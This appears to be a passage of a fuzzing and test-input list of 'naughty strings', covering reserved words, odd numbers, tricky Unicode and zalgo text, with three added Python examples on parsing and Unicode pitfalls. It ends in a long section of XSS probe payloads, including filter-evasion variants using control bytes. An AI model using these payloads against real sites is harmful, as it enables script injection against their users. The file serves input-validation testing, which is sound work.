# Reserved Strings
#
# Strings which may be used elsewhere in code
undefined
undef
null
NULL
(null)
nil
NIL
true
false
True
False
TRUE
FALSE
None
hasOwnProperty
\
\\
# Numeric Strings
#
# Strings which can be interpreted as numeric
0
1
1.00
$1.00
1/2
1E2
1E02
1E+02
-1
-1.00
-$1.00
-1/2
-1E2
-1E02
-1E+02
1/0
0/0
-2147483648/-1
-9223372036854775808/-1
-0
-0.0
+0
+0.0
0.00
0..0
.
0.0.0
0,00
0,,0
,
0,0,0
0.0/0
1.0/0.0
0.0/0.0
1,0/0,0
0,0/0,0
--1
-
-.
-,
999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999
NaN
Infinity
-Infinity
INF
1#INF
-1#IND
1#QNAN
1#SNAN
1#IND
0x0
0xffffffff
0xffffffffffffffff
0xabad1dea
123456789012345678901234567890123456789
1,000.00
1 000.00
1'000.00
1,000,000.00
1 000 000.00
1'000'000.00
1.000,00
1 000,00
1'000,00
1.000.000,00
1 000 000,00
1'000'000,00
01000
08
09
2.2250738585072011e-308
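# Added example, not part of the list: run the numeric strings above through
# Python's int()/float() and through a 32-bit division check, so the reader
# can see which of them a strict parser accepts and which ones a fixed-width
# integer type cannot divide. Python's own integers never overflow, so
# checked_div_i32() emulates INT_MIN / -1 explicitly; the int32 bounds and the
# helper names are this example's own. It also goes one step past the list by
# showing that int() accepts non-ASCII decimal digits (the Arabic-Indic
# digits that appear in the Unicode Numbers section further down).

```python
INT32_MIN, INT32_MAX = -2**31, 2**31 - 1


def parse_strict(s: str):
    """Return ("int", n), ("float", x) or ("reject", s).

    int() is tried first so integers stay exact. float() accepts a wider
    grammar ("1E2", "NaN", "Infinity", "INF") that many applications do not
    want to treat as a number. Grouping characters ("1,000.00"), currency
    ("$1.00"), fractions ("1/2") and C-style "0x0" / "1#INF" are rejected by
    both. int() does accept non-ASCII decimal digits such as "١٢٣".
    """
    try:
        return ("int", int(s, 10))
    except ValueError:
        pass
    try:
        return ("float", float(s))
    except ValueError:
        return ("reject", s)


def checked_div_i32(a: int, b: int) -> int:
    """Integer division as a 32-bit signed type sees it, with every trap
    surfaced as an exception rather than a crash or a wrapped result."""
    if not (INT32_MIN <= a <= INT32_MAX and INT32_MIN <= b <= INT32_MAX):
        raise ValueError("operand outside int32 range")
    if b == 0:
        raise ZeroDivisionError("division by zero")
    if a == INT32_MIN and b == -1:
        # 2**31 does not fit in int32: the SIGFPE / undefined-behaviour case.
        raise OverflowError("INT32_MIN / -1 overflows")
    q = abs(a) // abs(b)           # truncate toward zero, as C does
    return q if (a < 0) == (b < 0) else -q


def eval_division_string(s: str):
    """Evaluate one of the "a/b" strings through checked_div_i32(),
    returning ("ok", quotient) or ("error", exception class name)."""
    left, _, right = s.partition("/")
    try:
        return ("ok", checked_div_i32(int(left, 10), int(right, 10)))
    except (ValueError, ZeroDivisionError, OverflowError) as exc:
        return ("error", type(exc).__name__)


if __name__ == "__main__":
    for s in ["1E2", "01000", "08", "1,000.00", "NaN", "1#INF", "0x0", "١٢٣"]:
        print(repr(s), "->", parse_strict(s))
    for s in ["1/0", "0/0", "-2147483648/-1", "-9223372036854775808/-1", "-1/2"]:
        print(repr(s), "->", eval_division_string(s))
```

# The practical point: "01000" and "08" parse as decimal 1000 and 8 here, whereas
# a C-style reader treats a leading zero as octal and rejects "08"; "NaN" and
# "Infinity" are accepted by float() even though they are not numbers an
# application usually wants, and the two INT_MIN / -1 strings are the only
# divisions that fail for a reason other than a zero divisor.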
# Special Characters
#
# ASCII punctuation. All of these characters may need to be escaped in some
# contexts. Divided into three groups based on (US-layout) keyboard position.
,./;'[]\-=
<>?:"{}|_+
!@#$%^&*()`~
# Non-whitespace C0 controls: U+0001 through U+0008, U+000E through U+001F,
# and U+007F (DEL)
# Often forbidden to appear in various text-based file formats (e.g. XML),
# or reused for internal delimiters on the theory that they should never
# appear in input.
# The next line may appear to be blank or mojibake in some viewers.
��������������������������? | |
# Non-whitespace C1 controls: U+0080 through U+0084 and U+0086 through U+009F.
# Commonly misinterpreted as additional graphic characters.
# The next line may appear to be blank, mojibake, or dingbats in some viewers.
| |
# Whitespace: all of the characters with category Zs, Zl, or Zp (in Unicode
# version 8.0.0), plus U+0009 (HT), U+000B (VT), U+000C (FF), U+0085 (NEL),
# and U+200B (ZERO WIDTH SPACE), which are in the C categories but are often
# treated as whitespace in some contexts.
# This file unfortunately cannot express strings containing
# U+0000, U+000A, or U+000D (NUL, LF, CR).
# The next line may appear to be blank or mojibake in some viewers.
# The next line may be flagged for "trailing whitespace" in some viewers.
�� | |
# Unicode additional control characters: all of the characters with
# general category Cf (in Unicode 8.0.0).
# The next line may appear to be blank or mojibake in some viewers.
| |
# "Byte order marks", U+FEFF and U+FFFE, each on its own line.
# The next two lines may appear to be blank or mojibake in some viewers.
| |
� | |
# Unicode Symbols
#
# Strings which contain common unicode symbols (e.g. smart quotes)
Ω≈ç√∫˜µ≤≥÷
åß∂ƒ©˙∆˚¬…æ
œ∑´®†¥¨ˆøπ“‘
¡™£¢∞§¶•ªº–≠
¸˛Ç◊ı˜Â¯˘¿
ÅÍÎÏ˝ÓÔÒÚÆ☃
Œ„´‰ˇÁ¨ˆØ∏”’
`⁄€‹›fifl‡°·‚—±
⅛⅜⅝⅞
ЁЂЃЄЅІЇЈЉЊЋЌЍЎЏАБВГДЕЖЗИЙКЛМНОПРСТУФХЦЧШЩЪЫЬЭЮЯабвгдежзийклмнопрстуфхцчшщъыьэюя
٠١٢٣٤٥٦٧٨٩
# Unicode Subscript/Superscript/Accents
#
# Strings which contain unicode subscripts/superscripts; can cause rendering issues
⁰⁴⁵
₀₁₂
⁰⁴⁵₀₁₂
ด้้้้้็็็็็้้้้้็็็็็้้้้้้้้็็็็็้้้้้็็็็็้้้้้้้้็็็็็้้้้้็็็็็้้้้้้้้็็็็็้้้้้็็็็ ด้้้้้็็็็็้้้้้็็็็็้้้้้้้้็็็็็้้้้้็็็็็้้้้้้้้็็็็็้้้้้็็็็็้้้้้้้้็็็็็้้้้้็็็็ ด้้้้้็็็็็้้้้้็็็็็้้้้้้้้็็็็็้้้้้็็็็็้้้้้้้้็็็็็้้้้้็็็็็้้้้้้้้็็็็็้้้้้็็็็
# Quotation Marks
#
# Strings which contain misplaced quotation marks; can cause encoding errors
'
"
""
'"'
"'"'"
"'"'"'"
<foo val=“bar” />
<foo val=“bar” />
<foo val=”bar“ />
<foo val=`bar' />
# Two-Byte Characters
#
# Strings which contain two-byte characters: can cause rendering issues or character-length issues
田中さんにあげて下さい
パーティーへ行かないか
和製漢語
部落格
사회과학원 어학연구소
찦차를 타고 온 펲시맨과 쑛다리 똠방각하
社會科學院語學研究所
울란바토르
𠜎𠜱𠝹𠱓𠱸𠲖𠳏
# Changing length when lowercased
#
# Characters which increase in length (2 to 3 bytes) when lowercased
# Credit: https://twitter.com/jifa/status/625776454479970304
Ⱥ
Ⱦ
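# Added example, not part of the list: the two characters above (U+023A and
# U+023E) are 2 bytes in UTF-8 but lowercase to U+2C65 and U+2C66, which are
# 3 bytes each. A length limit enforced on the raw input and then applied to
# the lowercased value therefore under-counts, which is how a "fits in the
# column" check passes and the INSERT fails or truncates. The helper names and
# the byte limits below are this example's own.

```python
import unicodedata


def utf8_len(s: str) -> int:
    """Length in UTF-8 bytes, which is what storage limits usually mean."""
    return len(s.encode("utf-8"))


def growth_on_lower(s: str) -> int:
    """How many extra UTF-8 bytes s.lower() needs compared with s."""
    return utf8_len(s.lower()) - utf8_len(s)


def naive_fits(value: str, max_bytes: int) -> bool:
    """The bug: validate the raw input, then lowercase and store it."""
    return utf8_len(value) <= max_bytes


def store_lowercased(value: str, max_bytes: int) -> str:
    """Canonicalise first, then enforce the limit on the canonical form.

    Raises ValueError instead of letting the database truncate mid-character.
    """
    canonical = unicodedata.normalize("NFC", value).lower()
    if utf8_len(canonical) > max_bytes:
        raise ValueError(f"{utf8_len(canonical)} bytes exceeds {max_bytes}")
    return canonical


if __name__ == "__main__":
    for ch in ("\u023a", "\u023e"):      # the two list entries: Ⱥ and Ⱦ
        print(f"U+{ord(ch):04X} {utf8_len(ch)} bytes -> "
              f"U+{ord(ch.lower()):04X} {utf8_len(ch.lower())} bytes")
```

# Usage: naive_fits("ȺȾ", 4) says the 4-byte input fits a 4-byte column, but
# store_lowercased("ȺȾ", 4) raises because the lowercased form is 6 bytes.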
# Japanese Emoticons
#
# Strings which consist of Japanese-style emoticons which are popular on the web
ヽ༼ຈل͜ຈ༽ノ ヽ༼ຈل͜ຈ༽ノ
(。◕ ∀ ◕。)
`ィ(´∀`∩
__ロ(,_,*)
・( ̄∀ ̄)・:*:
゚・✿ヾ╲(。◕‿◕。)╱✿・゚
,。・:*:・゜’( ☻ ω ☻ )。・:*:・゜’
(╯°□°)╯︵ ┻━┻)
(ノಥ益ಥ)ノ ┻━┻
┬─┬ノ( º _ ºノ)
( ͡° ͜ʖ ͡°)
# Emoji
#
# Strings which contain Emoji; should be the same behavior as two-byte characters, but not always
😍
👩🏽
👾 🙇 💁 🙅 🙆 🙋 🙎 🙍
🐵 🙈 🙉 🙊
❤️ 💔 💌 💕 💞 💓 💗 💖 💘 💝 💟 💜 💛 💚 💙
✋🏿 💪🏿 👐🏿 🙌🏿 👏🏿 🙏🏿
🚾 🆒 🆓 🆕 🆖 🆗 🆙 🏧
0️⃣ 1️⃣ 2️⃣ 3️⃣ 4️⃣ 5️⃣ 6️⃣ 7️⃣ 8️⃣ 9️⃣ 🔟
# Regional Indicator Symbols
#
# Regional Indicator Symbols can be displayed differently across
# fonts, and have a number of special behaviors
🇺🇸🇷🇺🇸 🇦🇫🇦🇲🇸
🇺🇸🇷🇺🇸🇦🇫🇦🇲
🇺🇸🇷🇺🇸🇦
# Unicode Numbers
#
# Strings which contain unicode numbers; if the code is localized, it should see the input as numeric
123
١٢٣
# Right-To-Left Strings
#
# Strings which contain text that should be rendered RTL if possible (e.g. Arabic, Hebrew)
ثم نفس سقطت وبالتحديد،, جزيرتي باستخدام أن دنو. إذ هنا؟ الستار وتنصيب كان. أهّل ايطاليا، بريطانيا-فرنسا قد أخذ. سليمان، إتفاقية بين ما, يذكر الحدود أي بعد, معاملة بولندا، الإطلاق عل إيو.
בְּרֵאשִׁית, בָּרָא אֱלֹהִים, אֵת הַשָּׁמַיִם, וְאֵת הָאָרֶץ
הָיְתָהtestالصفحات التّحول
﷽
ﷺ
مُنَاقَشَةُ سُبُلِ اِسْتِخْدَامِ اللُّغَةِ فِي النُّظُمِ الْقَائِمَةِ وَفِيم يَخُصَّ التَّطْبِيقَاتُ الْحاسُوبِيَّةُ،
# Trick Unicode
#
# Strings which contain unicode with unusual properties (e.g. Right-to-left override) (cf. http://www.unicode.org/charts/PDF/U2000.pdf)
test | |
test | |
test | |
testtest | |
test | |
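# Added example, not part of the list, serving both the "Unicode additional
# control characters" entry (general category Cf) further up and the Trick
# Unicode section just above: the list's own lines here are invisible in most
# viewers, so the sample inputs below are constructed for this example. The
# check reports every Cf character with its code point and name, flags the
# bidi controls separately because they change display order, and produces
# the form a reader actually sees so that logs and comparisons agree with the
# screen. BIDI_CONTROLS and the function names are this example's own.

```python
import unicodedata

# Explicit bidi controls (LRE/RLE/PDF/LRO/RLO, the isolates LRI/RLI/FSI/PDI,
# and the marks LRM/RLM). All are category Cf; they are listed because a
# string containing one renders in a different order from how it is stored.
BIDI_CONTROLS = {
    "\u202a", "\u202b", "\u202c", "\u202d", "\u202e",
    "\u2066", "\u2067", "\u2068", "\u2069",
    "\u200e", "\u200f",
}


def format_chars(s: str) -> list:
    """Return (index, 'U+XXXX', name) for every Cf character in s."""
    found = []
    for i, ch in enumerate(s):
        if unicodedata.category(ch) == "Cf":
            found.append((i, f"U+{ord(ch):04X}", unicodedata.name(ch, "<unnamed>")))
    return found


def has_bidi_override(s: str) -> bool:
    """True if any explicit bidi control is present."""
    return any(ch in BIDI_CONTROLS for ch in s)


def visible_form(s: str) -> str:
    """Drop Cf characters so the stored value matches what a reader sees.

    U+200D ZERO WIDTH JOINER is kept: emoji sequences such as the ones in the
    Emoji section depend on it, and it does not reorder or hide text.
    """
    return "".join(ch for ch in s
                   if unicodedata.category(ch) != "Cf" or ch == "\u200d")


# Constructed samples for this example (not the list's own lines).
SAMPLES = {
    "plain": "test",
    "rtl_override": "abc\u202edef",     # U+202E RIGHT-TO-LEFT OVERRIDE
    "zero_width": "te\u200bst",         # U+200B ZERO WIDTH SPACE
    "bom_prefixed": "\ufefftest",       # U+FEFF as a stray byte order mark
    "zwj_emoji": "\U0001F469\u200d\U0001F4BB",
}


def scan_samples() -> dict:
    """Map each sample name to (number of Cf chars, bidi flag, visible form)."""
    return {name: (len(format_chars(s)), has_bidi_override(s), visible_form(s))
            for name, s in SAMPLES.items()}


if __name__ == "__main__":
    for name, result in scan_samples().items():
        print(f"{name:14} cf={result[0]} bidi={result[1]} visible={result[2]!r}")
```

# A reasonable policy for user-supplied identifiers (file names, display
# names) is to reject on has_bidi_override() and to store and compare
# visible_form() rather than the raw string.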
# Zalgo Text
#
# Strings which contain "corrupted" text. The corruption will not appear in non-HTML text, however. (via http://www.eeemo.net)
Ṱ̺̺̕o͞ ̷i̲̬͇̪͙n̝̗͕v̟̜̘̦͟o̶̙̰̠kè͚̮̺̪̹̱̤ ̖t̝͕̳̣̻̪͞h̼͓̲̦̳̘̲e͇̣̰̦̬͎ ̢̼̻̱̘h͚͎͙̜̣̲ͅi̦̲̣̰̤v̻͍e̺̭̳̪̰-m̢iͅn̖̺̞̲̯̰d̵̼̟͙̩̼̘̳ ̞̥̱̳̭r̛̗̘e͙p͠r̼̞̻̭̗e̺̠̣͟s̘͇̳͍̝͉e͉̥̯̞̲͚̬͜ǹ̬͎͎̟̖͇̤t͍̬̤͓̼̭͘ͅi̪̱n͠g̴͉ ͏͉ͅc̬̟h͡a̫̻̯͘o̫̟̖͍̙̝͉s̗̦̲.̨̹͈̣
̡͓̞ͅI̗̘̦͝n͇͇͙v̮̫ok̲̫̙͈i̖͙̭̹̠̞n̡̻̮̣̺g̲͈͙̭͙̬͎ ̰t͔̦h̞̲e̢̤ ͍̬̲͖f̴̘͕̣è͖ẹ̥̩l͖͔͚i͓͚̦͠n͖͍̗͓̳̮g͍ ̨o͚̪͡f̘̣̬ ̖̘͖̟͙̮c҉͔̫͖͓͇͖ͅh̵̤̣͚͔á̗̼͕ͅo̼̣̥s̱͈̺̖̦̻͢.̛̖̞̠̫̰
̗̺͖̹̯͓Ṯ̤͍̥͇͈h̲́e͏͓̼̗̙̼̣͔ ͇̜̱̠͓͍ͅN͕͠e̗̱z̘̝̜̺͙p̤̺̹͍̯͚e̠̻̠͜r̨̤͍̺̖͔̖̖d̠̟̭̬̝͟i̦͖̩͓͔̤a̠̗̬͉̙n͚͜ ̻̞̰͚ͅh̵͉i̳̞v̢͇ḙ͎͟-҉̭̩̼͔m̤̭̫i͕͇̝̦n̗͙ḍ̟ ̯̲͕͞ǫ̟̯̰̲͙̻̝f ̪̰̰̗̖̭̘͘c̦͍̲̞͍̩̙ḥ͚a̮͎̟̙͜ơ̩̹͎s̤.̝̝ ҉Z̡̖̜͖̰̣͉̜a͖̰͙̬͡l̲̫̳͍̩g̡̟̼̱͚̞̬ͅo̗͜.̟
̦H̬̤̗̤͝e͜ ̜̥̝̻͍̟́w̕h̖̯͓o̝͙̖͎̱̮ ҉̺̙̞̟͈W̷̼̭a̺̪͍į͈͕̭͙̯̜t̶̼̮s̘͙͖̕ ̠̫̠B̻͍͙͉̳ͅe̵h̵̬͇̫͙i̹͓̳̳̮͎̫̕n͟d̴̪̜̖ ̰͉̩͇͙̲͞ͅT͖̼͓̪͢h͏͓̮̻e̬̝̟ͅ ̤̹̝W͙̞̝͔͇͝ͅa͏͓͔̹̼̣l̴͔̰̤̟͔ḽ̫.͕
Z̮̞̠͙͔ͅḀ̗̞͈̻̗Ḷ͙͎̯̹̞͓G̻O̭̗̮
# Unicode Upsidedown
#
# Strings which contain unicode with an "upsidedown" effect (via http://www.upsidedowntext.com)
˙ɐnbᴉlɐ ɐuƃɐɯ ǝɹolop ʇǝ ǝɹoqɐl ʇn ʇunpᴉpᴉɔuᴉ ɹodɯǝʇ poɯsnᴉǝ op pǝs 'ʇᴉlǝ ƃuᴉɔsᴉdᴉpɐ ɹnʇǝʇɔǝsuoɔ 'ʇǝɯɐ ʇᴉs ɹolop ɯnsdᴉ ɯǝɹo˥
00˙Ɩ$-
# Unicode font
#
# Strings which contain bold/italic/etc. versions of normal characters
The quick brown fox jumps over the lazy dog
𝐓𝐡𝐞 𝐪𝐮𝐢𝐜𝐤 𝐛𝐫𝐨𝐰𝐧 𝐟𝐨𝐱 𝐣𝐮𝐦𝐩𝐬 𝐨𝐯𝐞𝐫 𝐭𝐡𝐞 𝐥𝐚𝐳𝐲 𝐝𝐨𝐠
𝕿𝖍𝖊 𝖖𝖚𝖎𝖈𝖐 𝖇𝖗𝖔𝖜𝖓 𝖋𝖔𝖝 𝖏𝖚𝖒𝖕𝖘 𝖔𝖛𝖊𝖗 𝖙𝖍𝖊 𝖑𝖆𝖟𝖞 𝖉𝖔𝖌
𝑻𝒉𝒆 𝒒𝒖𝒊𝒄𝒌 𝒃𝒓𝒐𝒘𝒏 𝒇𝒐𝒙 𝒋𝒖𝒎𝒑𝒔 𝒐𝒗𝒆𝒓 𝒕𝒉𝒆 𝒍𝒂𝒛𝒚 𝒅𝒐𝒈
𝓣𝓱𝓮 𝓺𝓾𝓲𝓬𝓴 𝓫𝓻𝓸𝔀𝓷 𝓯𝓸𝔁 𝓳𝓾𝓶𝓹𝓼 𝓸𝓿𝓮𝓻 𝓽𝓱𝓮 𝓵𝓪𝔃𝔂 𝓭𝓸𝓰
𝕋𝕙𝕖 𝕢𝕦𝕚𝕔𝕜 𝕓𝕣𝕠𝕨𝕟 𝕗𝕠𝕩 𝕛𝕦𝕞𝕡𝕤 𝕠𝕧𝕖𝕣 𝕥𝕙𝕖 𝕝𝕒𝕫𝕪 𝕕𝕠𝕘
𝚃𝚑𝚎 𝚚𝚞𝚒𝚌𝚔 𝚋𝚛𝚘𝚠𝚗 𝚏𝚘𝚡 𝚓𝚞𝚖𝚙𝚜 𝚘𝚟𝚎𝚛 𝚝𝚑𝚎 𝚕𝚊𝚣𝚢 𝚍𝚘𝚐
⒯⒣⒠ ⒬⒰⒤⒞⒦ ⒝⒭⒪⒲⒩ ⒡⒪⒳ ⒥⒰⒨⒫⒮ ⒪⒱⒠⒭ ⒯⒣⒠ ⒧⒜⒵⒴ ⒟⒪⒢
# Script Injection
#
# Strings which attempt to invoke a benign script injection; shows vulnerability to XSS
<script>alert(123)</script>
<script>alert('123');</script>
<img src=x onerror=alert(123) />
<svg><script>123<1>alert(123)</script>
"><script>alert(123)</script>
'><script>alert(123)</script>
><script>alert(123)</script>
</script><script>alert(123)</script>
< / script >< script >alert(123)< / script >
onfocus=JaVaSCript:alert(123) autofocus
" onfocus=JaVaSCript:alert(123) autofocus
' onfocus=JaVaSCript:alert(123) autofocus
<script>alert(123)</script>
<sc<script>ript>alert(123)</sc</script>ript>
--><script>alert(123)</script>
";alert(123);t="
';alert(123);t='
JavaSCript:alert(123)
;alert(123);
src=JaVaSCript:prompt(132)
"><script>alert(123);</script x="
'><script>alert(123);</script x='
><script>alert(123);</script x=
" autofocus onkeyup="javascript:alert(123)
' autofocus onkeyup='javascript:alert(123)
<script\x20type="text/javascript">javascript:alert(1);</script>
<script\x3Etype="text/javascript">javascript:alert(1);</script>
<script\x0Dtype="text/javascript">javascript:alert(1);</script>
<script\x09type="text/javascript">javascript:alert(1);</script>
<script\x0Ctype="text/javascript">javascript:alert(1);</script>
<script\x2Ftype="text/javascript">javascript:alert(1);</script>
<script\x0Atype="text/javascript">javascript:alert(1);</script>
'`"><\x3Cscript>javascript:alert(1)</script>
'`"><\x00script>javascript:alert(1)</script>
ABC DEF
ABC DEF
ABC DEF
ABC DEF
ABC DEF
ABC DEF
ABC DEF
ABC DEF
ABC DEF
ABC DEF
ABC DEF
ABC DEF
ABC DEF
ABC DEF
ABC DEF
ABC DEF
ABC DEF
ABC DEF
ABC DEF
ABC DEF
ABC DEF
ABC DEF
ABC DEF
ABC DEF
ABC DEF
ABC DEF
ABC DEF
<a href="\x0Bjavascript:javascript:alert(1)" id="fuzzelement1">test</a>
<a href="\x0Fjavascript:javascript:alert(1)" id="fuzzelement1">test</a>
<a href="\xC2\xA0javascript:javascript:alert(1)" id="fuzzelement1">test</a>
<a href="\x05javascript:javascript:alert(1)" id="fuzzelement1">test</a>
<a href="\xE1\xA0\x8Ejavascript:javascript:alert(1)" id="fuzzelement1">test</a>
<a href="\x18javascript:javascript:alert(1)" id="fuzzelement1">test</a>
<a href="\x11javascript:javascript:alert(1)" id="fuzzelement1">test</a>
<a href="\xE2\x80\x88javascript:javascript:alert(1)" id="fuzzelement1">test</a>
<a href="\xE2\x80\x89javascript:javascript:alert(1)" id="fuzzelement1">test</a>
<a href="\xE2\x80\x80javascript:javascript:alert(1)" id="fuzzelement1">test</a>
<a href="\x17javascript:javascript:alert(1)" id="fuzzelement1">test</a>
<a href="\x03javascript:javascript:alert(1)" id="fuzzelement1">test</a>
<a href="\x0Ejavascript:javascript:alert(1)" id="fuzzelement1">test</a>
<a href="\x1Ajavascript:javascript:alert(1)" id="fuzzelement1">test</a>
<a href="\x00javascript:javascript:alert(1)" id="fuzzelement1">test</a>
<a href="\x10javascript:javascript:alert(1)" id="fuzzelement1">test</a>
<a href="\xE2\x80\x82javascript:javascript:alert(1)" id="fuzzelement1">test</a>
<a href="\x20javascript:javascript:alert(1)" id="fuzzelement1">test</a>
<a href="\x13javascript:javascript:alert(1)" id="fuzzelement1">test</a>
<a href="\x09javascript:javascript:alert(1)" id="fuzzelement1">test</a>
<a href="\xE2\x80\x8Ajavascript:javascript:alert(1)" id="fuzzelement1">test</a>
<a href="\x14javascript:javascript:alert(1)" id="fuzzelement1">test</a>
<a href="\x19javascript:javascript:alert(1)" id="fuzzelement1">test</a>
<a href="\xE2\x80\xAFjavascript:javascript:alert(1)" id="fuzzelement1">test</a>
<a href="\x1Fjavascript:javascript:alert(1)" id="fuzzelement1">test</a>
<a href="\xE2\x80\x81javascript:javascript:alert(1)" id="fuzzelement1">test</a>
<a href="\x1Djavascript:javascript:alert(1)" id="fuzzelement1">test</a>
<a href="\xE2\x80\x87javascript:javascript:alert(1)" id="fuzzelement1">test</a>
<a href="\x07javascript:javascript:alert(1)" id="fuzzelement1">test</a>
<a href="\xE1\x9A\x80javascript:javascript:alert(1)" id="fuzzelement1">test</a>
<a href="\xE2\x80\x83javascript:javascript:alert(1)" id="fuzzelement1">test</a>
<a href="\x04javascript:javascript:alert(1)" id="fuzzelement1">test</a>
<a href="\x01javascript:javascript:alert(1)" id="fuzzelement1">test</a>
<a href="\x08javascript:javascript:alert(1)" id="fuzzelement1">test</a>
<a href="\xE2\x80\x84javascript:javascript:alert(1)" id="fuzzelement1">test</a>
<a href="\xE2\x80\x86javascript:javascript:alert(1)" id="fuzzelement1">test</a>
<a href="\xE3\x80\x80javascript:javascript:alert(1)" id="fuzzelement1">test</a>
<a href="\x12javascript:javascript:alert(1)" id="fuzzelement1">test</a>
<a href="\x0Djavascript:javascript:alert(1)" id="fuzzelement1">test</a>
<a href="\x0Ajavascript:javascript:alert(1)" id="fuzzelement1">test</a>
<a href="\x0Cjavascript:javascript:alert(1)" id="fuzzelement1">test</a>
<a href="\x15javascript:javascript:alert(1)" id="fuzzelement1">test</a>
<a href="\xE2\x80\xA8javascript:javascript:alert(1)" id="fuzzelement1">test</a>
<a href="\x16javascript:javascript:alert(1)" id="fuzzelement1">test</a>
<a href="\x02javascript:javascript:alert(1)" id="fuzzelement1">test</a>
<a href="\x1Bjavascript:javascript:alert(1)" id="fuzzelement1">test</a>
<a href="\x06javascript:javascript:alert(1)" id="fuzzelement1">test</a>
<a href="\xE2\x80\xA9javascript:javascript:alert(1)" id="fuzzelement1">test</a>
<a href="\xE2\x80\x85javascript:javascript:alert(1)" id="fuzzelement1">test</a>
<a href="\x1Ejavascript:javascript:alert(1)" id="fuzzelement1">test</a>
<a href="\xE2\x81\x9Fjavascript:javascript:alert(1)" id="fuzzelement1">test</a>
<a href="\x1Cjavascript:javascript:alert(1)" id="fuzzelement1">test</a>
<a href="javascript\x00:javascript:alert(1)" id="fuzzelement1">test</a>
<a href="javascript\x3A:javascript:alert(1)" id="fuzzelement1">test</a>
<a href="javascript\x09:javascript:alert(1)" id="fuzzelement1">test</a>
<a href="javascript\x0D:javascript:alert(1)" id="fuzzelement1">test</a>
<a href="javascript\x0A:javascript:alert(1)" id="fuzzelement1">test</a>
`"'><img src=xxx:x \x0Aonerror=javascript:alert(1)>
`"'><img src=xxx:x \x22onerror=javascript:alert(1)>
`"'><img src=xxx:x \x0Bonerror=javascript:alert(1)>
`"'><img src=xxx:x \x0Donerror=javascript:alert(1)>
`"'><img src=xxx:x \x2Fonerror=javascript:alert(1)>
`"'><img src=xxx:x \x09onerror=javascript:alert(1)>
`"'><img src=xxx:x \x0Conerror=javascript:alert(1)>
`"'><img src=xxx:x \x00onerror=javascript:alert(1)>
`"'><img src=xxx:x \x27onerror=javascript:alert(1)>
`"'><img src=xxx:x \x20onerror=javascript:alert(1)>
"`'><script>\x3Bjavascript:alert(1)</script>
"`'><script>\x0Djavascript:alert(1)</script>
"`'><script>\xEF\xBB\xBFjavascript:alert(1)</script>
"`'><script>\xE2\x80\x81javascript:alert(1)</script>
"`'><script>\xE2\x80\x84javascript:alert(1)</script>
"`'><script>\xE3\x80\x80javascript:alert(1)</script>
"`'><script>\x09javascript:alert(1)</script>
"`'><script>\xE2\x80\x89javascript:alert(1)</script>
"`'><script>\xE2\x80\x85javascript:alert(1)</script>
"`'><script>\xE2\x80\x88javascript:alert(1)</script>
"`'><script>\x00javascript:alert(1)</script>
"`'><script>\xE2\x80\xA8javascript:alert(1)</script>
"`'><script>\xE2\x80\x8Ajavascript:alert(1)</script>
"`'><script>\xE1\x9A\x80javascript:alert(1)</script>
"`'><script>\x0Cjavascript:alert(1)</script>
"`'><script>\x2Bjavascript:alert(1)</script>
"`'><script>\xF0\x90\x96\x9Ajavascript:alert(1)</script>
"`'><script>-javascript:alert(1)</script>
"`'><script>\x0Ajavascript:alert(1)</script>
"`'><script>\xE2\x80\xAFjavascript:alert(1)</script>
"`'><script>\x7Ejavascript:alert(1)</script>
"`'><script>\xE2\x80\x87javascript:alert(1)</script>
"`'><script>\xE2\x81\x9Fjavascript:alert(1)</script>
"`'><script>\xE2\x80\xA9javascript:alert(1)</script>
"`'><script>\xC2\x85javascript:alert(1)</script>
"`'><script>\xEF\xBF\xAEjavascript:alert(1)</script>
"`'><script>\xE2\x80\x83javascript:alert(1)</script>
"`'><script>\xE2\x80\x8Bjavascript:alert(1)</script>
"`'><script>\xEF\xBF\xBEjavascript:alert(1)</script>
"`'><script>\xE2\x80\x80javascript:alert(1)</script>
"`'><script>\x21javascript:alert(1)</script>
"`'><script>\xE2\x80\x82javascript:alert(1)</script>
"`'><script>\xE2\x80\x86javascript:alert(1)</script>
"`'><script>\xE1\xA0\x8Ejavascript:alert(1)</script>
"`'><script>\x0Bjavascript:alert(1)</script>
"`'><script>\x20javascript:alert(1)</script>
"`'><script>\xC2\xA0javascript:alert(1)</script>
<img \x00src=x onerror="alert(1)">
<img \x47src=x onerror="javascript:alert(1)">
<img \x11src=x onerror="javascript:alert(1)">
<img \x12src=x onerror="javascript:alert(1)">
<img\x47src=x onerror="javascript:alert(1)">
<img\x10src=x onerror="javascript:alert(1)">
<img\x13src=x onerror="javascript:alert(1)">
<img\x32src=x onerror="javascript:alert(1)">
<img\x47src=x onerror="javascript:alert(1)">
<img\x11src=x onerror="javascript:alert(1)">
<img \x47src=x onerror="javascript:alert(1)">
<img \x34src=x onerror="javascript:alert(1)">
<img \x39src=x onerror="javascript:alert(1)">
<img \x00src=x onerror="javascript:alert(1)">
<img src\x09=x onerror="javascript:alert(1)">
<img src\x10=x onerror="javascript:alert(1)">
<img src\x13=x onerror="javascript:alert(1)">
<img src\x32=x onerror="javascript:alert(1)">
<img src\x12=x onerror="javascript:alert(1)">
<img src\x11=x onerror="javascript:alert(1)">
<img src\x00=x onerror="javascript:alert(1)">
<img src\x47=x onerror="javascript:alert(1)">
<img src=x\x09onerror="javascript:alert(1)">
<img src=x\x10onerror="javascript:alert(1)">
<img src=x\x11onerror="javascript:alert(1)">
<img src=x\x12onerror="javascript:alert(1)">
<img src=x\x13onerror="javascript:alert(1)">
<img[a][b][c]src[d]=x[e]onerror=[f]"alert(1)">
<img src=x onerror=\x09"javascript:alert(1)">
<img src=x onerror=\x10"javascript:alert(1)">
<img src=x onerror=\x11"javascript:alert(1)">
<img src=x onerror=\x12"javascript:alert(1)">
<img src=x onerror=\x32"javascript:alert(1)">
<img src=x onerror=\x00"javascript:alert(1)">
<a href=javascript:javascript:alert(1)>XXX</a>
<img src="x` `<script>javascript:alert(1)</script>"` `>
<img src onerror /" '"= alt=javascript:alert(1)//">
<title onpropertychange=javascript:alert(1)></title><title title=>
<a href=http://foo.bar/#x=`y></a><img alt="`><img src=x:x onerror=javascript:alert(1)></a>">
<script src="/\%(jscript)s"></script>
<script src="\\%(jscript)s"></script>
<IMG """><SCRIPT>alert("XSS")</SCRIPT>">
<IMG SRC=javascript:alert(String.fromCharCode(88,83,83))>
<IMG SRC=# onmouseover="alert('xxs')">
<IMG SRC= onmouseover="alert('xxs')">
<IMG onmouseover="alert('xxs')">
<IMG SRC=javascript:alert('XSS')>
<IMG SRC=javascript:alert('XSS')>
<IMG SRC=javascript:alert('XSS')>
<IMG SRC="jav ascript:alert('XSS');">
